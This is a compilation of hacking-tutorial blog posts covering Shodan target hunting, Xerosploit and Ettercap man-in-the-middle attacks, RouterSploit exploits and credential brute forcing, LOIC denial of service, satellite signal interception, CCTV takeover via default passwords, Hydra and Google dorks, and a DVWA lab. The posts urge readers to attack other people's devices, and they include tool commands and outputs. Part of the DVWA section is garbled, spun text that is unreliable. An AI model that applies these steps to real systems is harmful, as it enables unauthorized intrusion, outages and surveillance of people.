How To Use Shodan For Finding Targets, Information Gathering & Hacking ?

0

Ever thought what hackers do when they don’t find a target to pop into? well, at least they don’t search target on Google and waste their precious time, they search for targets on SHODAN.

Since the world is developing into a huge brain of Internal connected Devices capable of responding to the surroundings and communicate through which we generally call “INTERNET” and this theory is a part of Internet of Things(IoT).

The Search engine which hackers mostly use to search for the targets has been called as “The Scariest Search Engine on the Internet by its creator John Matherly.

Shodan server details

SHODAN

What is SHODAN

Some have described it as the search engine for hackers, Shodan is a search engine for finding specific devices, and device types, that exist online and are open on the internet. The most popular searches are for things like webcam, Linksys, Cisco, Netgear, Proxy, etc.

Unlike Google, which crawls the Web looking for websites, Shodan navigates the Internet’s back channels. It’s a kind of “dark” Google, looking for the servers, webcams, printers, routers and all the other stuff that is connected to and makes up the Internet.

It works by scanning the Internet and parsing the banners that are returned by various devices. Using that information, Shodan can tell you things like what web server (and version) is most popular, or how many anonymous FTP servers exist in a particular location, and what make and model the device may be.

Shodan search

Getting SHODAN:

  1. Creating User account

     

    shodan IoT search engine Open up a browser and type in Shodan.io, you will be greeted with a welcome page, Navigate to Login/Register and fill in the details.

    creating shodan account

  2. Searching on Shodan

    After you register you can click on “Get Started” or search by typing.

    Explore shodan search shodan for vulnerable target

 

Filters for search optimisation

city: Find devices in a particular city
country: Find devices in a particular country
geo: You can pass it coordinates
hostname: Find values that match the hostname
net: Search based on an IP or /x CIDR
os: Search based on an operating system
port: Find particular ports that are open
before/after: Find results within a timeframe

shodan search filters

product: To find a particular product

Shodan reads the banners from IP addresses and then categorises all types of devices that have a remote interface from all over the world. Many of these devices have default logins, so once you find a device with default login, you may be able to own it!

In addition, Shodan has some powerful features to search specifically for devices by type, login, port, and geography. I will show you some of these on my next Shodan tutorial, so keep coming back my greenhorn hackers!

shodan also provides you with a browser plugin, access so that when you come across something you want to know then you can simply click on the plugin access it known data on shodan.

shodan plugin plugin shodan

Metasploit, The worlds one of the most used exploit makers for hackers also proved an auxiliary module for shodan,

Metasploit module: auxiliary/gather/shodan_search

This module uses the Shodan API to search Shodan. API key is required to use this module which can be obtained by registering at shodan. The output from the module is displayed on the screen, which you can save to a file or to the MSF database. SHODAN filters like port, hostname, os, geo, city can be used as queries, but you are limited to restriction like download, locate. etc…. depending upon the account’s type(free/member) you use to generate API key.


msf > use auxiliary/gather/shodan_search
msf auxiliary(shodan_search) > show actions
...actions...
msf auxiliary(shodan_search) > set ACTION <action-name>
msf auxiliary(shodan_search) > show options
...show and set options...
msf auxiliary(shodan_search) > run

so keep hunting for open devices on the internet using Shodan and make them slaves…..

Kindly let us know if you have any queries and do rate the article and share to let others know about this tool, to find targets to hack. To know how to brute force into a protocol read the article on How To Crack Passwords Using THC Hydra? Happy Hunting !!!!!….

 

How Xerosploit Is Used For Hacking : Step-By-Step Guide

2

Right, in this Article you’ll be Knowing about XeroSploit used for man in middle attacks

Networking is an important platform for an Ethical Hacker to check on, many of the threat can come from the internal network like network sniffing, Arp Spoofing, MITM e.t.c,

For those who are not familiar with Man-in-the-middle attack, welcome to the world of internal network attacks

Man-In-The-Middle:-

The name itself reveals the attack pattern, the attacker gets in between the victim and his gateway(Router) connection, sniffing(Stealing) the network packets flow from the gateway to router and vice-versa.

Mitm attack graph

 

Thus giving access to the hacker to obtain all the information victim sends to remote server

MITM key exchange

 

There are many open source tools available online for this attack like Ettercap, MITMF, Xerosploit, e.t.c

This article is on Xerosploit which provides advanced MITM attack on your local network to sniff packets, steal password e.t.c

Its specific features are the following:

  • Port scanning
  • Network mapping
  • Dos attack
  • Html code injection
  • Javascript code injection
  • Download interception and replacement
  • Sniffing
  • Dns spoofing
  • Background audio reproduction
  • Images replacement
  • Drifnet
  • Web page defacement and more …

Installing Xerosploit:

Xerosploit is an attack tool for MITM which can run only on Linux OS to do so follow the simple steps:-

Open up terminal and type

  • “git clone https://github.com/LionSec/xerosploit.git” (downloads xerosploit)
  • cd xerosploit (change your working directory to the downloaded folder)
  • chmod +x install.py (get permission for the file to be executed)
  • python install.py (execute the file to be installed)
  • select your OS( 1. Kali/Ubuntu 2.Parrot)

wait for some time this tool will update your system and install the required dependencies after installation run the command

“xerosploit”

installing xerosploit

 

MITM using xerosploit

  1. check for your IP address, Gateway, Interface which will be shown at the start of the xerosploit interface

Xerosploit      2.Now type in “help” to list the available commands

Xerosploit options

Here you can

  • Scan : Scan the network for available connected devices
  • Iface : It can be used to change your interface manually
  • Gateway : This can be used if you want to set your gateway other than the one selected
  • Start : If you want to target a known victim you can use this
  • Rmlog : This will remove all the logs of xerosploit

3.To continue the attack we scan the network first

Xerosploit scan

Here we can see all the device currently connected. Type in help to continue.

  1. We want to sniff all packets across the network hence we type all, if you want to target a single victim type in his IP or if multiple then IP1, IP2, IP3…

5.Again type in “help” to check available commands and then run any of the following commands

xerosploit attack modules

6.Select the modules and type in “run”.

 

This tool is best both for beginners and experts as it allows you an easy interface to inject HTML or JavaScript to redirect your victim to a malicious link or to force him to download malicious content using JavaScript alert and Download function which can be injected into their network traffic and get access to their system.

Besides this xerosploit can do more lot of things, hang on to the next article, till then Happy Hunting. If you want to know how to attack using SSLStrip then read the article on How To Hack With Xerosploit ? : Step-By-Step Guide .

Thank you.

How To Hack A Router With RouterSploit ?!

0

Routersploit is a tool similar to Metasploit but designed for the router.In this modern age of smart devices, as their number is growing the need of their security check for the vulnerability is also expanding.The companies are patching their products for security which are known as a security update.While most of the internet users only update their PC but forget about their router which is your gateway to the internet.Routers are the first devices which are exposed to the Internet openly and this protects your device from the darkness of the web using its firewall.Hence it’s become necessary to update their firmware regularly.

This article on routersploit will make you an expert on finding vulnerability of your router or any router.

So let’s get started,

About routersploit

The RouterSploit Framework is an open-source exploitation framework dedicated to embedded devices.

It consists of various modules that aid penetration testing operations:

exploits – modules that take advantage of identified vulnerabilities.

RouterSploit currently has support to a limited number of exploits, but they can be extended easily from popular exploit database online.

Creating Routersploit modules is very easy so that everyone can contribute to this excellent project.

The full process is described in RouterSploit Wiki.

In the wiki, you can find a code skeleton and all the necessary classes for module development.

The exploit stage in RouterSploit works pretty similar to Metasploit.

Anyone who had worked with Metasploit will find himself at home with RouterSploit.

Picking the desired exploit, eased with command completion leads to exploit configuration section after which we run our exploit.

RouterSploit also provides info about the exploits and the short description.

It is also possible to check if the target is vulnerable to particular exploit before you start the exploitation process

creds – modules designed to test credentials against network services

This allows you to run a brute force attack using dictionary on various network protocols like,

  • FTP
  • ssh
  • telnet
  • HTTP basic auth
  • HTTP form auth

This module is again classified into categories of two with default credentials and using a custom dictionary.

scanners – modules that check if a target is vulnerable to any exploit

This allows you to check whether any exploit module is vulnerable to your selected target.

Installing Routersploit

 


git clone https://github.com/reverse-shell/routersploit

./rsf.py


routersploit

 

Scanner

rsf > Use scanner/autopwn

rsf (AutoPwn) > Show Options

rsf (AutoPwn) > Set target (IP)

rsf (AutoPwn)> run

This scanner scan the target with popular exploits and list the exploits that are vulnerable

·Modules

To use a module type

rsf > use exploits/multi/misfortune_cookie

rsf (Misfortune Cookie) > show options




Target options:




   Name       Current Settings     Description

   ----       ----------------     -----------

   port       80                   Target port

   target                          Target address e.g. http://192.168.1.1

 

 

rsf (Misfortune Cookie) > set target 192.168.0.1

[+] {'target': '192.168.0.1'}

rsf (Misfortune Cookie) > check

[+] Target is vulnerable

rsf (Misfortune Cookie) >

 

·Credentials(Brute Force)

This method can be used when the module

rsf > use creds/http_basic_bruteforce

rsf (HTTP Basic Bruteforce) > show options

Target options:
Name        CurrentSettings       Description
----        ---------------       -----------
port           80                  target port
target                            Target IP address or file with target:port (file://)

Module options:

   Name          Current settings     Description                                  
   ----          ----------------     -----------                                   
   path          /                   URL Path                                     
   usernames     admin               Username or file with usernames (file://)
   passwords    file:///usr/share/routersploit/routersploit/wordlists/passwords.txt  Password or file with passwords(file://) 
   threads       8                   Numbers of threads                       
   verbosity     yes                 Display authentication attempts
rsf (HTTP Basic Bruteforce) > set target 192.168.0.2

[+] {'target': '192.168.0.2'}
rsf (HTTP Basic Bruteforce) > set passwords file:///usr/share/wordlists/nmap.lst

[+] {'passwords': 'file:///usr/share/wordlists/nmap.lst'}

rsf (HTTP Basic Bruteforce) > set verbosity no

[+] {'verbosity': 'no'}

rsf (HTTP Basic Bruteforce) > run

[*] Running module...

[*] Elapsed time:  1.97385120392 seconds
[+] Credentials found!

   Target          Port     Login     Password    
   ------          ----     -----     --------    
   192.168.0.2     80       admin     password    

rsf (HTTP Basic Bruteforce) >

For SSH:

rsf > use creds/

creds/ftp_bruteforce     creds/http_basic_bruteforce

creds/http_form_bruteforce       creds/snmp_bruteforce        creds/ssh_default            creds/telnet_default 

creds/ftp_default            creds/http_basic_default     

creds/http_form_default      creds/ssh_bruteforce

creds/telnet_bruteforce      

rsf > use creds/ssh_default
rsf (SSH Default Creds) >

rsf (SSH Default Creds) > show options

Target options:    

Name       Current settings      Description              
-------   --------------------  ------------          
target                           Target IP address        
port              22             Target port

 

Module options:    
Name    CurrentSettings   Description
----    ---------------   -----------
threads    8

Numbers of threads

defaults

file:///root/git/routersploit/routersploit/wordlists/defaults.txt     User:Pass or file with default credentials (file://)

rsf (SSH Default Creds) > set target 192.168.1.53

[+] {'target': '192.168.1.53'}

rsf (SSH Default Creds) > run

[*] Running module...

[*] worker-0 process is starting...

[*] worker-1 process is starting...
[*] worker-2 process is starting...

[*] worker-3 process is starting...

[*] worker-4 process is starting...

[*] worker-5 process is starting...

[*] worker-6 process is starting...

[*] worker-7 process is starting...

[-] worker-4 Authentication failed. Username: '3comcso' Password: 'RIP000'

[-] worker-1 Authentication failed. Username: '1234' Password: '1234'

[-] worker-0 Authentication failed. Username: '1111' Password: '1111'

[-] worker-7 Authentication failed. Username: 'ADVMAIL' Password: 'HP'
[-] worker-3 Authentication failed. Username: '266344' Password: '266344'

[-] worker-2 Authentication failed. Username: '1502' Password: '1502' 

(..)

Routersploit is a great tool for finding vulnerabilities in any router and exploiting it

so find vulnerabilities and keep exploiting them and to know how to hack any Operating System using shell code generator, which is mostly undetected by antivirus software read the article on How To Hack Into Android & Systems Using Venom?

Happy Hunting…

How To Use Recon-ng ? [Information Gathering Series]

0

This is the second article in the series on information gathering.

This time we will be discussing one of the most convenient and versatile  informaton gathering tools out there,Recon-ng.

It was developed by Tim Tones and here is the download link https://bitbucket.org/LaNMaSteR53/recon-ng.git.

You can clone it from the bitbucket repositories

 Recon-ng

It is an open source  passive reconnaissance framework written in python for linux.

It is an all in one tool that acts as subdomain finder, contacts harvester, email harvester, geo location finder, vulnerability finder and a host of other things.

It has its own built in modules and it works by gathering information from different sources.

In order to utilize all the sources and modules we need to pay API keys, some are exensive , some of them are free and some of the modules don’t require API keys at all.

We will discuss them later in the article.

Most people that use recon-ng are using a linux based platform, mostly kali linux so we will go  step by step through the proceess of  installing recon-ng and using it on kali linux.

Firstly we will need to use git  which is  preinstalled in Kali.

 

 I had it already downloaded and installed  so i had to cancel it midway but you will need to navigate into the folder using the cd command where it is downloaded and  invoke the python script with the command recon-ng.py.

The screen shot provides a glimpse on how it looks like.

Now it is time for us.

Now we can use the help option to to look at all the availabe commands.

Lets try that

recon-ng

 

In order to view all the modules we need to type in the command show modules, which displays all the available modules in the frame work.

Lets try that

 

Recon-ng uses API keys which is short for application programming interfaces in order to interact with the concerned application and extract the  required information.

To put it simply we are asking for permission from the respective organization to use the services of their applications.

This is done so to prevnt the abuse of their service.

In order to display the available API keys we need to type in the command keys list.

This lists out the keys.

Lets try that

 

While I have not added any keys yet but the command to add keys is


keys add <the application name> <keys> .


I just added a dummy 23456 key to show how the command works.

The process of finding the API keys is the most time consuming one.

We have to register ourselves with respective services and request for the key.

In order to keep things interesting we will skip the part and let you decide which  API keys suits your needs.

Facebook, Google, Shodan, Twitter, Instagram, LinkedIn and Bing provide API keys for free.

Here is a useful link to find required API https://raikia.com/recon-ng-api-key-creation/

Ok, now we come to the reconnaissance part, first we need to create a workspace which creates seperate database for each of our target.

Each  of this database will contain all the information extracted about each target.

To list out the available workspaces we use the command workspaces lists, to add a new workspaces we use the command


workspaces add <target name>


 

 

Here we set hackeroyale as the name of the workspaces.

Now we select the workspace with the command workspaces


select <name of the workspace>.


Now lets try  running a few modules against it.

First lets add the domains with the command


add domains <domain name>


 

 Now lets start running modules against the target, first lets  resolve the domain  name with the command use resolve, it will list the availabe modules related to resolving the domain name.

 

This concludes the first part of the article.

The 2nd part will cover modules for different information extraction.

Till then happy hunting.

 

How To DoS A Website With LOIC [Low Orbit Ion Cannon] ?

0

Right, in this Article You’ll be Knowing about a Popular Tool i.e Low Orbit Ion Cannon

Low Orbit Ion Cannon

Low Orbit Ion Cannon is a tool popular among script kiddies for attacking any server and bringing it down by performing DOS or DDOS attack.

The world of Information Security is growing leading to the development of codes which brings vulnerability within them causing a loophole in the security.

But the most common issue till date to most of the web servers and service providers online is DDoS, one of the oldest and developing methods of the hacking world.

Denial Of Service

DOS or Denial-Of-Service attack is one of the most popular hack methodologies which most of the hackers around the world use to hack into any network or bring any service down.

In this way, the server will not be able to accept valid user request causing a denial of service to the user.

They are as DOS or DDOS attack.

DOS refers to the attack type when an attacker attacks a target vulnerable to DOS with only a single IP and the target tries to reply for each of the packet requests it gets and when the request flow is more than it’s Bandwidth or more than its accepting capacity then it fails to accept new connections and rejects the new connections causing denial of service.

This can be prevented by modern firewalls by applying a patch script in them which would specify the number of connections that must be provided to a single IP or IP range.

Distributed DOS Attack

DDOS is a type of multiple DOS attack which is performed by an attacker using BOTNETS which he/she had made in course of time by sending malicious link or attachment and compromising internet users or webcams or smart devices.

Since the attacker has the access to the botnets which can be instructed to perform a DOS attack cause multiple devices to DOS a single target which is patched only for DOS rather than DDOS.

In this case, the target receives request’s from multiple IP’s over the internet causing the DOS patch to breakout.

This effectively makes it impossible to stop the attack simply by blocking a single IP more than that it’s very difficult to distinguish legitimate users data packets from an attacking packet.

This can also be done by a script which performs the task of generating packets with different source IP’s but single Destination IP.

LOIC (Low Orbit Ion Cannon)

Low Orbit Ion Cannon is an open source network stress testing and Denial of Service attack tool, written in C#. LOIC was developed by Praetox Technologies but later was released into public domain hosting on several open platforms.

The tool is able to perform a simple dos attack by sending a large sequence of UDP, TCP or HTTP requests to the target server.

It’s a very easy tool to use, even by those lacking any basic knowledge of hacking.

The only thing a user needs to know for using the tool is the URL of the target.

Type of attacks

The tool opens multiple connections to the target server and sends a continuous sequence of messages which can be defined from the TCP/UDP message parameter option available on the tool.

In the TCP and UDP attacks, the string is sent as a plain text but in the HTTP attack, it is included in the contents of an HTTP GET message.

UDP Attack 

  • To perform the UDP attack, select the method of attack as UDP.
  •  It has port 80 as the default option selected, but you can change this according to your need.
  • It is a connectionless protocol.

TCP Attack: 

  • This method is similar to UDP attack.
  • Select the type of attack as TCP to use this. It is a connection based protocol.

HTTP Attack: 

  • In this attack, the tool sends HTTP requests to the target server.
  • A web application firewall can detect this type of attack easily.

How to Perform DDoS using LOIC

  1. Downloading :-

You can Download LOIC from any site by making a google search and install on any OS, it would be advantageous if you using any Linus Distributions (Kali Linux) and build from downloading it from GitHub. Copy-paste the following command in Linux terminal to download LOIC

“ git clone https://github.com/NewEraCracker/LOIC.git

  1. Run the tool and Provide the IP or URL of the Victim in the Target Section 1, it will be shown in the selected target box.
  2. Select your attack method in section
  3. You can observe your attack status in the box provided under the selected target region.
  4. You can also set the speed of the attack by the slider. It is set to faster as default but you can slow down it with the slider.

Here’s the meaning of each field:

  • IDLE: It shows the number of threads idle. It must be zero for higher efficiency of the attack.
  • Connecting: This shows the number of connection that is been tried to connect to the victim server.
  • Requesting: This shows the number of connections that are requesting some information from the victim server.
  • Downloading: This shows the number of connection that is initiating some download for some information from the server.
  • Downloaded: This number shows how many times data is been downloading, which has been initiated from victim server on which you are attacking.
  • Requested: This number shows how many times a data download has been requested from victim server.
  • Failed: This number shows how many times the server did not respond to the request. A larger number of fails in this field indicates the server is going down. The success of the attack can be measured by the number shown in this field.

 

Drawbacks of using LOIC

            This tool does not take any precautions to hide IP address of the origin of the attack. Attacks generated by this tool are simple and expose the IP address of attacker in each request packet sent to victim server to flood the request queue. If you are thinking that we can use proxies to solve this problem, you are wrong. Attackers cannot use proxies in these attacks because your requests will hit the proxy server, not the target server. So you will not be able to launch a DOS attack on the server effectively while using a proxy. But some analysts say that this can be used with a proxy server if the proxy is robust enough. According to them, all your request packets will be forwarded to the server system by proxy at the end.

This is all about LOIC,

Hope to see you guys in the next article, till then Keep Hacking.

 

How To Sniff Passwords Using Ettercap ? [MITM Series : 5]

1

Welcome Back to all my Hackers and Geeks
Here, In this Article You are going to Know the complete synopsis of Ettercap.

Ettercap

One of the most famous and used tool to perform Man-in-the-middle attack for those who do not like Command line interface, ettercap-gtk provides a graphical interface for beginners.

While most of the users treat Ettercap only for Man in the middle attack, this tool can also perform many tasks other than that, like DOS a target e.t.c.

To access Ettercap in Kali Linux

1.Click on Applications on the top of menu bar.

ettercap

 

2.Go to Sniffing & Spoofing, where you will find Ettercap.

 

3.Click on sniff and select Unified Sniffing and select the interface you want to sniff packets on.

UNIFIED, this method sniffs all the packets that pass on the cable.

The packet not directed to the host running ettercap will be forwarded automatically using layer 3 routeing.

So you can use an MITM attack launched from a different tool and let ettercap modify the packets and forward them for you

BRIDGED, it uses two network interfaces and forwards the traffic from one to the other while performing sniffing and content filtering.

This sniffing method is totally stealthy since there is no way to find that someone is in the middle of the cable.

You can look at this method as an MITM attack at layer 1.

You will be in the middle of the cable between two entities.

Don’t use it on gateways or it will transform your gateway into a bridge.

4.Go to plugins and Load manage.

Here you will find all the plugins of ettercap preinstalled.

Below is the description on the plugins pre-installed in Ettercap:-

1.ARP_Cop

It reports suspicious ARP activity by passively monitoring ARP requests.

It can report ARP poisoning attempts or simple IP-conflicts or IP-changes.

If you build the initial host list the plugin will run more accurately.

2.Auto add

It will automatically add new victims to the ARP poisoning MITM attack when they come up.

It looks for ARP requests on the LAN and when detected it will add the host to the victim’s list if it was specified in the TARGET.

3.chk_poison

It performs a check to see if the arp poisoning module of ettercap was successful.

It sends spoofed ICMP echo packets to all the victims of the poisoning pretending to be each of the other targets.

If we can catch an ICMP reply with our MAC address as a destination it means that the poisoning between those two targets is successful.

It checks both ways of each communication.

4.Dns_spoof

This plugin intercepts DNS query and replies with a spoofed answer.

You can choose to which address the plugin has to reply by modifying the etter.dns file.

5.dos_attack

This plugin runs a DOS attack against a victim IP address.

It first “scans” the victim to find open ports, then starts to flood these ports with SYN packets, using a “phantom” address as source IP.

Then it uses fake ARP replies to intercept packets for the phantom host.

When it receives SYN-ACK from the victim, it replies with an ACK packet creating an ESTABLISHED connection.

You have to use a free IP address in your subnet.

6.dummy

Only a template to demonstrate how to write a plugin.

7.find_conn

A simple plugin that listens for ARP requests to show you all the targets a host which wants to talk to. It can also help you find addresses in an unknown LAN.

8.find_ettercap

Try to identify ettercap packets sent on the LAN. It could be useful to detect if someone is using ettercap.

9.find_ip

Find the first unused IP address in the range specified by the user in the target list.

Some other plugins (such as gre_relay) need an unused IP address of the LAN to create a “fake” host.

It can also be useful to obtain an IP address in an unknown LAN where there is no DHCP server.

10.Finger

Uses the passive fingerprint capabilities to fingerprint a remote host.

It does a connect() to the remote host to force the kernel to reply to the SYN with an SYN+ACK packet.

The reply will be collected and the fingerprint is displayed.

11.finger_submit

Use this plugin to submit a fingerprint to the ettercap website.

If you found an unknown fingerprint, but you know for sure the operating system of the target, you can submit it so it will be inserted in the database in the next ettercap release.

12.Isolate

The isolate plugin will isolate a host from the LAN.

It will poison the victim’s arp cache with its own mac address associated with all the host it tries to contact.

This way the host will not be able to contact other hosts because the packet will never reach the wire.

13.Rand_flood

Floods the LAN with random MAC addresses.

14.repoison_arp

It solicits poisoning packets after broadcast ARP requests (or replies) from a poisoned host.

For example, we are poisoning Group1 impersonating Host2.

If Host2 makes a broadcast ARP request for Host3, it is possible that Group1 caches the right MAC address for Host2 contained in the ARP packet.

This plugin re-poisons Group1 cache immediately after a legal broadcast ARP request (or reply).

This is all about Ettercap-gtk an MITM attack Tool,

Hope to see you guys in the next article, till then Keep Hacking.

How To Hack Satellites ? Is That Even Possible?!

1

Right, In this Article You will be Knowing about how to Hack a Satellite ?

We all know about Hacking Windows / Linux, CCTV cameras etc… but  Many people have doubt that can a Satellite can be Hacked??

This is what we are going to know in this article .. let’s jump into it.
Satellite

A satellite is a moon, planet or machine that orbits a planet or star.

For example, Earth is a satellite because it orbits the sun.

Likewise, the moon is a satellite because it orbits Earth.

Usually, the word “satellite” refers to a machine that is launched into space and moves around Earth or another body in space.

Earth and the moon are examples of natural satellites.

Thousands of artificial, or man-made, satellites orbit Earth.

Some take pictures of the planet that help meteorologists predict weather and track hurricanes.

Some take pictures of other planets, the sun, black holes, dark matter or faraway galaxies.

These pictures help scientists better understand the solar system and universe.

Still other satellites are used mainly for communications, such as beaming TV signals and phone calls around the world.

A group of more than 20 satellites make up the Global Positioning System, or GPS.

If you have a GPS receiver, these satellites can help figure out your exact location.

Is it possible to hack Satellite communication?

Well, different resources have different answer to this question as some says it is as simple to hack satellite while others had proved that hacking satellite is not very easy process due to its high security indeed satellite intercept is done.

Satellite hacking can be broken down into four main types: Jamming, Eavesdrop, Hijacking, and Control.

JAMMING: – is flooding or consuming a signal, transmitter, or receiver, so that the valid transmission cannot reach its end.

EAVESDROP: – it allows a hacker to see and hear what is being transmitted.

HIJACKING: – is the illegal use of a satellite for transmission, or holding a signal to broadcast and replace it with another. Files sent via satellite Internet can be copied and altered in transit.

CONTROLLING – it refers to taking control of all ground stations, bus, and/or payload – in particular, being able to trick a satellite in orbit.

Step- by- Step processes to interrupt Satellite

Satellite communication is used by us in many senses and industries and we all know that how they are important in our lives.

There are different kinds of satellites depending upon the distance from the earth and others depending upon their orbits. Spherical and elliptical orbital are two kinds of orbital satellites.

Here is the step by process of hacking satellite by Mike Stevens, Professor of satellite ethical hacking training at International Institute of Cyber Security.

STEP 1

You will need a Satellite dish with Low Noise Block down converter (LNB). The bigger the dish the better the range of signals it can pick. The cost of good satellite dish can vary from 50 USD to 300 USD and are very easily available.

The size of the antenna depends upon the satellite you wish to sniff; you would like to just sniff one particular satellite then a small dish of 75cm will also do. This you can easily find out by searching over the Internet or you can visit the Website of Satellite Company.

You can get details about the satellite you want to intercept from Internet.

STEP 2

The next thing you need is a DVB Tuner card (DVB-S/S2 tuner card). A DVB tuner card is a kind of card that allows satellite signals to be received by a computer. Most DVB tuners also function as video and multimedia content capture cards, allowing them to record satellite contents onto a hard disk. The cards come in PCI Express (PCIe), PCMCIA, Express Card, or USB devices. The tuner card is easily available in market and cost around 100 USD. Few cards that work smoothly are DVBWorld, TBS/QBOX, Azure ware, TechniSat, Techno Trend, Genitech, and TeVii.  These cards can even installed as normal PCI cards or in USB form and their installation is very easy.

STEP 3

Now you need feed scanner software so that you can do automatic scanning and stream readers. dll , it’s basically the protocol driver that turns streams into readable data such as binary and ASCII files “Videos, documents, pages, torrents”. There are many free software’s available online. Some of the scanning software’s are- Crazy Scan, Easy Blind Scan. With this software you can do Auto Scanning.

STEP 4

After that you will need software depending on what your end motive is. This software allows offline downloading of data, live streaming of Radio and video, satellite internet and intercepting signals. Some of these software’s are: Skynet, Fishnet, DVBDream, PROG DVB, ALTDVB, and TSReader

Then an uplink earth station transmits the preferred signal to satellite. The satellite receives and processes the incoming signal by changing the frequency and intensifies it. The satellite thus transmits the signal back to earth, typically covering large geographical areas.

This content is only for education purpose

I hope this Article Helps You.

Happy Hacking!!!!

How To Hack A CCTV Camera?

0

Researcher from cloud-based video surveillance company Cloud view suggested that the majority of CCTV (Closed Circuit Television) systems can be hacked, providing an open door to cyber attackers.

Amazingly you can not only hack but can control almost every type of CCTV cameras.

However today we will learn about hacking private CCTV and Google hacking- step by step.

PRIVATE CCTV HACKING

Step 1:- Download Angry Ip Scanner

Angry Ip scanner is powerful GUI Port scanner. It is available for all major OS.

CCTV HACKING

Step 2:- Opt Ip Address Range

It’s foremost to choose proper Ip address range for CCTV camera hacking.

CCTV cameras are connected with broadband internet connection.

If your access is broadband router then find your public Ip address.

Type ‘My IP’ in Google. Google will show your public Ip address


Ip range can be 77.247.181.1 o 77.247.181.255 or 77.247.181.1 o 77.247.185.255


Step 3:- Organize Angry Ip for CCTV Camera Hacking

Open Angry Ip Scanner

Go to tools > Preferences > Ports | add ports 80,8080,23 in Port selection tab.

You can also add web detect.

As this will help you to detect and can show short details about device details connected to internet.

For example:


CCTV camera models name

CCTV camera name

Router name or router model name

Way to add web detects as follows-

Go to Tools > Fetchers > add (<<) web detect

Click OK


 

Step 4:-  Start Ip Range Scanning

Add Ip range in Ip range tab and click start.

After scanning you will find information in web detect tab some examples as follows-

 


DVRDVS-Webs —– CCTV camera

Webs —– CCTV camera

Hikvision-Webs —– CCTV camera

iBall-Baton —– CCTV camera

Copy Ip address of detected CCTV camera, paste in browser and press enter.


Step 5:-  Default Username and Password

Mainly the CCTV cameras and router configured default username and password. Like-

Username: admin | password: admin/(blank password)/12378/11111

You can also find default username and password list by searching on Google.

Some CCTV cameras require plugin, you can download it from same page.

If not found plugin at same page then go to manufacture website site and download it.

Step 6:-  Split CCTV Camera Password Using Hydra

If default password not works then we need to crack it.

Hydra is powerful brute for tool and can crack CCTV cameras password.

Hydra syntax


-s 80 — define port number

-L admin — default login name admin

-P /root/desktop/worldlist.txt — choose your word list for brute force

-e — empty password

ns — try login as password and try empty password

http — port name for attack


hydra

Using these you can hack CCTV cameras.

WAY TO HACK CCTV BY GOOGLE HACKING

Step 1:  Go to Google! http://www.google.com

Step 2:  Enter any one of the following lines:


* Inurl: view/index.shtml

* Inurl: view/view.shtml

* Live applet

* intitle:”live view” intitle: axis

* Intitle: live applet

*allintitle:”Network Camera

* intitle: axis intitle:”video serve


Step 3:  Find a website similar to this: http://67.53.48.2/CgiStart?page=Single&Language=0

Step 4:  Open a link from that…and hacking is done.

Wanna See Japan Live Traffic Camera ? Click Here

NOTE :  CCTV’s are found almost  on every possible place for safety and security purpose to discourage criminal and prevent crime so above given tutorial is just for knowledge not for crime purpose.

Let me know what you feel about this Article? and how you used this for hacking? is it really helps?

Pass Your Comments.

Check out our artefact on Nessus Here 

Happy Hacking!!

How To Practice Hacking With DVWA ?! : Step-By-Step Guide

0
DVWA

Hello Viewers, For the Hackers and the security Professionals they need to practice and test their skills in legal environment so that it will help web designers better understand the procedures of securing web applications and help to learn web application security.So how can we do that?? the solution is DVWA which is vulnerable web application.

Here in this article I came up with Hacking with DVWA which is quite useful for Hackers today.

Damn Vulnerable Web App (DVWA)

Its fundamental objectives are to be a guide for security experts to test their aptitudes and instruments in a legitimate situation, help web designers better comprehend the procedures of securing web applications and help instructors/understudies to educate/learn web application security in a classroom domain.

The point of DVWA is to hone the absolute most basic web weakness, with different troublesomely levels, with a basic clear interface. It would be ideal if you note, there are both reported and undocumented defenselessness with this product.

Damn Vulnerable Web App is accessible either as a bundle that will keep running all alone web server or as a Live CD:

  • DVWA v1.9 Source (Stable) – [1.3 MB] Download ZIP – Released 2015-10-05
  • Form 1.0.7 LiveCD – [480 MB]  Download ISO – Released 2010-09-08
  • Advancement Source (Latest)  Download ZIP

DVWA can be Installed Either in Windows or Kali Linux

  • Know Total Installation Guide of DVWA in Windows from Here.
  • Know Total Installation Guide of DVWA in Kali Linux from Here.

Upto Know We became acquainted with what is DVWA and its Installation .

What’s more, now we will perceive How to do Practice with DVWA

Right off the bat, We will do,

DVWA Cross Site Request Forgery 

Will demonstrate to you best practices to abuse a CSRF helplessness on DVWA (Damn Vulnerable Web Application)

CSRF remains for Cross Site Request Forgery

What really CSRF do implies, We ride a clients session and constrain them to take undesirable activities on a web application  giving they are at present validated with the application.

This is an exceptionally basic assault. How about we hop ideal in and investigate.

Initial step, lets do a little recon on the secret word change shape. Present a secret key change and investigate the HTTP ask.

  • Its a GET ask for, and we can see the parameters sent alongside the demand.

     

  • So here is the assault situation. Programmer with pernicious expectation send the casualty to my site. Here is the thing that my site resembles:

  • Looks sufficiently innocuous. To the extent the casualty is concerned, it’s simply message. Be that as it may, lets investigate the hood.

  • Rather than the src ascribe indicating a picture resource we’re indicating the secret word change endpoint and changing the watchword to “pwned”.

     

  • So when the casualty visits our aggressors site they are unconscious that anything has happened. However, in the event that we take a gander at the system demands:

  • Our img label made the program send a GET ask for to change the secret word endpoint.

     

  • Furthermore, on the grounds that the GET ask for originated from the casualties program, and the casualty was at that point confirmed, it sent the PHPSESSID in a HTTP treat.

     

  • So to the extent the web application is concerned, the demand originated from a validated client.

     

  • Presently you will have the capacity to login with the new secret word “pwned”.

DVWA Brute Force 

With this exhibit you can finish a savage compel assault on DVWA (Damn Vulnerable Web Application).

To Complete this Attack We require the accompanying necessities

  • Kali Linux
  • DVWA v1.9 running on a different machine

Right off the bat, we should comprehend what is going on when the client presents a frame.

For example, is it a GET or POST ask? Where is the demand going to? What information is being sent?.

Kali accompanies an effective apparatus called Burp Suite.

Burp Suite is a colossal apparatus, and does a huge amount of various stuff.

For this assault we’ll simply be concentrating on how we can utilize it for our animal constrain assault.

Burp Suite will go about as an intermediary server.

HTTP ask for through an intermediary:


HTTP request through a proxy:

Our browser -> Proxy server -> Target server


  • With Burp Suite sitting in the center, we can block the demand from our program before it achieves the objective server.

     

  • There is various reasons why we would need. With regards to this assault we are doing it so we can assess the HTTP ask.

Setting up the proxy server

  • For setting up Proxy Server, We Open Burp Suite and Click Proxy in the best column of tabs, at that point select Option.

     

  • You’ll see the intermediary server address.

  • Kali’s default introduced program is Ice Weasel

     

  • Open it and we’ll guide it toward our Burp Suite intermediary server

     

  • In the url bar sort

In the url bar type 


  • It will lead you to setting page

     

  • On the left select Advanced, from the tabs on the privilege select Network. Snap Settings and enter the intermediary server address.

